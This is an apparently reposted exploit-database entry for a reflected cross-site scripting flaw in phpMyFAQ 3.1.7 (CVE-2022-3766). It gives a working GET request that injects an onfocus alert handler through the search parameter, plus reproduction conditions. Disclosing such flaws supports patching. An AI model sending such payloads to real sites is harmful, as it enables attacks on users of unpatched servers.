phpMyFAQ 3.1.7 Reflected Cross-Site Scripting (XSS)
phpMyFAQ 3.1.7 存在反射型XSS漏洞。攻击者可通过构造特定GET请求触发弹窗等恶意行为。该漏洞存在于搜索功能中。利用条件包括未启用安全机制且目标运行旧版本。 2025-12-14 22:34:2 Author: cxsecurity.com(查看原文) 阅读量:1 收藏
phpMyFAQ 3.1.7 存在反射型XSS漏洞。攻击者可通过构造特定GET请求触发弹窗等恶意行为。该漏洞存在于搜索功能中。利用条件包括未启用安全机制且目标运行旧版本。 2025-12-14 22:34:2 Author: cxsecurity.com(查看原文) 阅读量:1 收藏
# Exploit Title: phpMyFAQ 3.1.7 - Reflected Cross-Site Scripting (XSS) # Date: 2025-11-25 # Exploit Author: CodeSecLab # Vendor Homepage: https://github.com/thorsten/phpmyfaq/ # Software Link: https://github.com/thorsten/phpmyfaq/ # Version: 3.1.7 # Tested on: Windows # CVE : CVE-2022-3766 Proof Of Concept GET http://phpmyfaq1/index.php?action=main&search=%22%20onfocus%3D%22alert%281%29 Additional Conditions: - Ensure that no security mechanisms (like a web application firewall) are blocking the specific request pattern. - The application must be running a phpMyFAQ version prior to 3.1.8. Steps to Reproduce Log in phpmyfaq. Send the request. Observe the result
文章来源: https://cxsecurity.com/issue/WLB-2025120013
如有侵权请联系:admin#unsafe.sh
如有侵权请联系:admin#unsafe.sh